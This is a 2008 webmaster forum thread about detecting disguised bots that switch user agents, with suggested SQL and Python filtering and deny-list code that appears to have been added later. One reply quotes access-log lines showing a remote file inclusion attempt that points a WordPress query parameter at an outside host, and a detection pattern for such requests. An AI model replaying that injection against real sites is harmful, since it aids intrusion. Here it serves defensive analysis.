Internet Security Discussion Forum: This forum is for the discussion of security-related issues. If you find a new phishing scheme, spyware, virus, or malicious site, let us know about it. If any of the above found you, here's where you ask for help.
Last Thursday I developed and implemented a new logging system to identify which products on my site are the most popular. It is designed to be robust enough both to show visitors a live list of what is popular and to show users customized recommendations based on their browsing history. The system records not only the product viewed but also the user's IP address and user agent, and I logged everything so I would have the largest possible data set to test it with.
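The post doesn't show the logging code itself. As a minimal sketch, assuming an SQLite table named product_views with hypothetical columns product_id, ip, user_agent and viewed_at, recording a view and building the "most popular" list might look like this:

```python
import sqlite3

# Hypothetical schema: one row per product page view.
SCHEMA = """
CREATE TABLE IF NOT EXISTS product_views (
    product_id INTEGER NOT NULL,
    ip         TEXT    NOT NULL,
    user_agent TEXT    NOT NULL,
    viewed_at  TEXT    NOT NULL  -- 'YYYY-MM-DD HH:MM:SS'
)
"""


def log_view(conn, product_id, ip, user_agent, viewed_at):
    """Record one product page view."""
    conn.execute(
        "INSERT INTO product_views (product_id, ip, user_agent, viewed_at) "
        "VALUES (?, ?, ?, ?)",
        (product_id, ip, user_agent, viewed_at),
    )


def most_popular(conn, limit=10, exclude_ips=()):
    """Return (product_id, views) pairs, most viewed first, ignoring views
    from any IP in exclude_ips (for example, suspected bots)."""
    exclude_ips = list(exclude_ips)
    where = ""
    if exclude_ips:
        placeholders = ",".join("?" * len(exclude_ips))
        where = f"WHERE ip NOT IN ({placeholders})"
    sql = (
        "SELECT product_id, COUNT(*) AS views FROM product_views "
        f"{where} GROUP BY product_id ORDER BY views DESC, product_id LIMIT ?"
    )
    return conn.execute(sql, exclude_ips + [limit]).fetchall()
```

The exclude_ips parameter is where addresses identified as bots could be dropped from the popularity figures without deleting the raw log rows.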
I came in today and started analyzing the recorded data. In addition to the expected bots from Google/MSN/Yahoo, there were the expected (and easily filtered) spambots. I also noticed a lot of visits from disguised bots that I would probably never have found without the filters I added to this system. The following is from one such bot (user agent, IP address, timestamp):

Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818; AT&T CSM6.0) 220.95.108.239 2008-05-09 08:24:08
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) 220.95.108.239 2008-05-09 08:31:45
Mozilla/5.0 (compatible; Googlebot/2.1; +How Google crawls my site) 220.95.108.239 2008-05-09 08:38:27
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 220.95.108.239 2008-05-09 08:44:52
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4 220.95.108.239 2008-05-09 08:55:01
Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5 220.95.108.239 2008-05-09 09:23:43
Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419.3 (KHTML, like Gecko) Safari/419.3 220.95.108.239 2008-05-09 09:31:08
Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818; AT&T CSM6.0) 220.95.108.239 2008-05-09 09:36:59
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461) 220.95.108.239 2008-05-09 09:43:15
Mozilla/4.0 (compatible; MSIE 5.5; Windows 9 220.95.108.239 2008-05-09 09:48:44
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) 220.95.108.239 2008-05-09 09:56:14
Mozilla/4.0 (compatible; MSIE 5.5; Windows 9 220.95.108.239 2008-05-09 09:59:23
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4 220.95.108.239 2008-05-09 10:02:03
Googlebot/2.1 (+How Google crawls my site) 220.95.108.239 2008-05-09 10:04:41

Of course, this is only the traffic from that one bot on one product page. There are hits from literally hundreds of similar bots on the same page, and the pattern repeats across thousands of product pages.
Is there any way to filter these bad bots out programmatically? Even just an SQL query that could spot them somewhat reliably would help: I could list them, remove them from the popularity system, and add them to my deny list.
__________________
The best way to learn anything is to question everything.
This doesn't look like a normal bot; it looks more like a malicious one. I've been seeing a lot of these lately. My suggestion: capture the IP address and user agent of each request, store the incoming data, and then query it by IP address and user agent. If a single IP address shows up with more than two different user agents, add that IP to your deny list.
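This rule maps onto a single grouped SQL query, which also covers the original request for "just an SQL query". A sketch, assuming a hypothetical product_views table with ip and user_agent columns and run here through Python's sqlite3 module; the query itself is plain SQL, though placeholder syntax varies between database drivers:

```python
import sqlite3

# Hypothetical log table; the thread only says the IP and user agent are stored.
SCHEMA = """
CREATE TABLE IF NOT EXISTS product_views (
    product_id INTEGER NOT NULL,
    ip         TEXT    NOT NULL,
    user_agent TEXT    NOT NULL,
    viewed_at  TEXT    NOT NULL
)
"""

# Flag any IP that has been seen with more than ? distinct user agents.
SUSPECT_IPS_SQL = """
SELECT ip,
       COUNT(DISTINCT user_agent) AS agents,
       COUNT(*)                   AS hits
FROM product_views
GROUP BY ip
HAVING COUNT(DISTINCT user_agent) > ?
ORDER BY agents DESC, ip
"""


def suspect_ips(conn, max_agents=2):
    """Return (ip, distinct_agents, hits) rows for likely disguised bots."""
    return conn.execute(SUSPECT_IPS_SQL, (max_agents,)).fetchall()
```

The default of two agents is the threshold suggested above. Many legitimate users can share one address behind a proxy or NAT gateway, so it is worth reviewing the list before moving every result onto a deny list.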
__________________
I use Country IP Blocks as added security for my networks and servers.
Quote:
80.230.118.211 - - [12/May/2008:06:39:29 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Googlebot/2.1 (h t t p:// googlebot.com/bot. html)"
80.230.118.211 - - [12/May/2008:06:48:35 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
80.230.118.211 - - [12/May/2008:06:53:47 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"
80.230.118.211 - - [12/May/2008:06:58:42 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818; AT&T CSM6.0)"
80.230.118.211 - - [12/May/2008:07:03:35 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020527)"
80.230.118.211 - - [12/May/2008:07:10:53 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 9
80.230.118.211 - - [12/May/2008:07:19:51 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5"

This "bot" initially pretends to be Googlebot, but it quickly becomes apparent that it isn't. It is obviously trying to get past traditional filters that rely on fixed criteria; here it attempts to cloak its identity by switching platform and user agent. That switching is in itself the signature of undesirable traffic. In the case above, I am redirecting the traffic elsewhere based on several pieces of information: IP, platform, user agent and, of course, the obvious attempt to remotely inject a PHP script through the WordPress query variables.

In your case, I think it is best to contain the IP address if it shows more than two changes, counting changes of both platform and user agent.
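These criteria (IP, platform, user agent and a remote URL in the query string) can be checked directly against an Apache combined-format access log. The Python sketch below counts, per IP, how many times the user agent switches between consecutive requests, reports how many distinct platforms those agents claim, and flags any request whose query string carries a full http://, https:// or ftp:// URL as a parameter value. The platform regex is deliberately crude, and flag_ips, the threshold of two changes and the reason strings are illustrative assumptions, not the poster's actual filter:

```python
import re
from collections import defaultdict

# Apache "combined" format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
# Crude platform guess from the user agent; real UA parsing is much messier.
PLATFORM_RE = re.compile(r"Windows NT [\d.]+|Windows 9[58]|Win 9x [\d.]+|Mac OS X|Linux")
# A full URL passed as a parameter value, as in "/?p=http://...".
REMOTE_URL_RE = re.compile(r"=\s*(?:https?|ftp)://", re.IGNORECASE)


def platform_of(agent):
    match = PLATFORM_RE.search(agent)
    return match.group(0) if match else "unknown"


def flag_ips(lines, max_changes=2):
    """Return {ip: [reasons]} for IPs that look like disguised bots."""
    last_agent = {}               # ip -> user agent of its previous request
    changes = defaultdict(int)    # ip -> number of user-agent switches
    platforms = defaultdict(set)  # ip -> platforms claimed so far
    reasons = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that don't parse (e.g. truncated entries)
        ip, agent = m["ip"], m["agent"]
        platforms[ip].add(platform_of(agent))
        if ip in last_agent and last_agent[ip] != agent:
            changes[ip] += 1
        last_agent[ip] = agent
        if REMOTE_URL_RE.search(m["request"]):
            reasons[ip].add("remote URL in query string")
    for ip, count in changes.items():
        if count > max_changes:
            reasons[ip].add(f"{count} user-agent changes, {len(platforms[ip])} platforms")
    return {ip: sorted(found) for ip, found in reasons.items()}
```

Lines that don't match the pattern, such as a truncated entry, are simply skipped. Legitimate redirect parameters can also carry full URLs, so the remote-URL check may need an allow list for your own scripts.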
You could also add a time element to the mix and use it, together with the first two criteria, as the deciding factor.
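One way to add the time element is a sliding window: flag an IP only when it presents more than two distinct user agents within a given span of time. In this Python sketch the one-hour window, the two-agent limit and the names flag_by_window and parse_ts are hypothetical choices to tune against real traffic; the input is assumed to be (ip, user_agent, datetime) tuples, for example read back from the log table:

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta


def parse_ts(text):
    """Parse timestamps in the 'YYYY-MM-DD HH:MM:SS' form used in the first post."""
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")


def flag_by_window(hits, window=timedelta(hours=1), max_agents=2):
    """Return the set of IPs that used more than max_agents distinct user
    agents within any span of length `window`.

    hits: iterable of (ip, user_agent, datetime) tuples, in any order.
    """
    by_ip = defaultdict(list)
    for ip, agent, ts in hits:
        by_ip[ip].append((ts, agent))

    flagged = set()
    for ip, events in by_ip.items():
        events.sort()                 # chronological order per IP
        recent = deque()              # (ts, agent) pairs inside the window
        counts = defaultdict(int)     # agent -> occurrences inside the window
        for ts, agent in events:
            recent.append((ts, agent))
            counts[agent] += 1
            # Drop events that have fallen out of the window.
            while ts - recent[0][0] > window:
                _, old_agent = recent.popleft()
                counts[old_agent] -= 1
                if counts[old_agent] == 0:
                    del counts[old_agent]
            if len(counts) > max_agents:
                flagged.add(ip)
                break
    return flagged
```

With a one-hour window, the 220.95.108.239 sequence from the first post qualifies within its first few requests: three different user agents arrive between 08:24:08 and 08:38:27.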
Last edited by Tech Manager; 05-12-2008 at 05:57 PM.
Cool. My log looks quite similar to yours, so I'm probably dealing with a similar system. I guess the final piece, then: is there a way to give Apache a text file to use as a deny list that can be updated regularly without restarting the server?
You could use a text file, but I suggest a database solution. Establish the acceptable criteria, then redirect any traffic that doesn't meet those criteria. In fact, it's simple enough to redirect the traffic back to the questionable IP itself. You could even append a message to the redirect if you choose.
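The database approach is only described in outline here. As a hedged sketch of the idea in Python, the WSGI middleware below looks up the client's address, lets unknown IPs through, and redirects deny-listed IPs back to their own address, optionally appending a message as a query parameter. The denied_ips table, the msg parameter and the names sqlite_lookup and DenyListMiddleware are hypothetical; the same logic would sit wherever your application handles each request:

```python
import sqlite3
from urllib.parse import quote


def sqlite_lookup(database, uri=False):
    """Return lookup(ip) -> None if the IP is not denied, else its message.

    Assumes a hypothetical table: denied_ips(ip TEXT PRIMARY KEY, note TEXT).
    A new connection per call keeps the lookup safe to use from several threads.
    """
    def lookup(ip):
        conn = sqlite3.connect(database, uri=uri)
        try:
            row = conn.execute(
                "SELECT note FROM denied_ips WHERE ip = ?", (ip,)
            ).fetchone()
        finally:
            conn.close()
        return None if row is None else (row[0] or "")
    return lookup


class DenyListMiddleware:
    """WSGI middleware that bounces deny-listed clients back to their own IP."""

    def __init__(self, app, lookup):
        self.app = app          # the wrapped WSGI application
        self.lookup = lookup    # callable: ip -> None or message string

    def __call__(self, environ, start_response):
        ip = environ.get("REMOTE_ADDR", "")
        message = self.lookup(ip)
        if message is None:
            return self.app(environ, start_response)
        host = f"[{ip}]" if ":" in ip else ip   # IPv6 literals need brackets
        location = f"http://{host}/"
        if message:
            location += "?msg=" + quote(message)
        start_response("302 Found", [("Location", location), ("Content-Length", "0")])
        return [b""]
```

Taking the lookup as a plain callable keeps the middleware independent of the storage; any function that maps an IP to None or a message string will do.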
Later, you could add problematic IPs to your .htaccess file. But the database solution will be quicker and will probably use fewer resources than having Apache read the .htaccess file on every request.
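Moving confirmed offenders into .htaccess can be scripted as well. A sketch, assuming the generated rules make up the entire .htaccess file (merge by hand if yours contains other directives): it validates each address, removes duplicates, and emits Apache 2.2 Order/Allow/Deny rules or, with apache24=True, the Apache 2.4 "Require not ip" equivalent. render_htaccess and write_atomically are hypothetical helper names:

```python
import ipaddress
import os
import tempfile


def _parse(ips):
    """Keep only valid, unique IP addresses, sorted IPv4 first."""
    addrs = set()
    for raw in ips:
        try:
            addrs.add(ipaddress.ip_address(raw.strip()))
        except ValueError:
            continue  # skip anything that is not a single IP address
    return sorted(addrs, key=lambda a: (a.version, int(a)))


def render_htaccess(ips, apache24=False):
    """Build .htaccess deny rules for the given IP strings."""
    addrs = _parse(ips)
    if apache24:
        lines = ["<RequireAll>", "    Require all granted"]
        lines += [f"    Require not ip {a}" for a in addrs]
        lines.append("</RequireAll>")
    else:
        lines = ["Order Allow,Deny", "Allow from all"]
        lines += [f"Deny from {a}" for a in addrs]
    return "\n".join(lines) + "\n"


def write_atomically(path, text):
    """Write to a temp file in the same directory, then rename over path,
    so Apache never reads a half-written file."""
    directory = os.path.dirname(os.path.abspath(path))
    with tempfile.NamedTemporaryFile("w", dir=directory, delete=False) as tmp:
        tmp.write(text)
    os.chmod(tmp.name, 0o644)  # temp files are created 0600; Apache must read it
    os.replace(tmp.name, path)
```

Because Apache re-reads .htaccess on each request wherever AllowOverride permits these directives, a regenerated file takes effect without restarting the server.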
Last edited by Tech Manager; 05-12-2008 at 06:06 PM.
Similar Threads
| Thread | Thread Starter | Forum | Replies | Last Post |
| Finding humor in the deluge of spam emails! | TrafficProducer | The Castle Breakroom (General: Any Topic) | 3 | 04-08-2006 04:20 AM |
| Tracking Bots | bretlawson | Google Discussion Forum | 0 | 01-09-2005 04:09 PM |
| Search Bots | ohlson | Graphics & Design Discussion Forum | 1 | 09-10-2004 01:54 PM |
| Different Google Bots? | Pokeey | Google Discussion Forum | 1 | 03-08-2004 12:56 PM |
| Shallow Bots - Deep Bots? | jonathan-uk | Google Discussion Forum | 1 | 02-01-2004 09:32 PM |
WebProWorld is an iEntry, Inc. ® site. © 2009 All Rights Reserved. iEntry, Inc., 2549 Richmond Rd., Lexington, KY 40509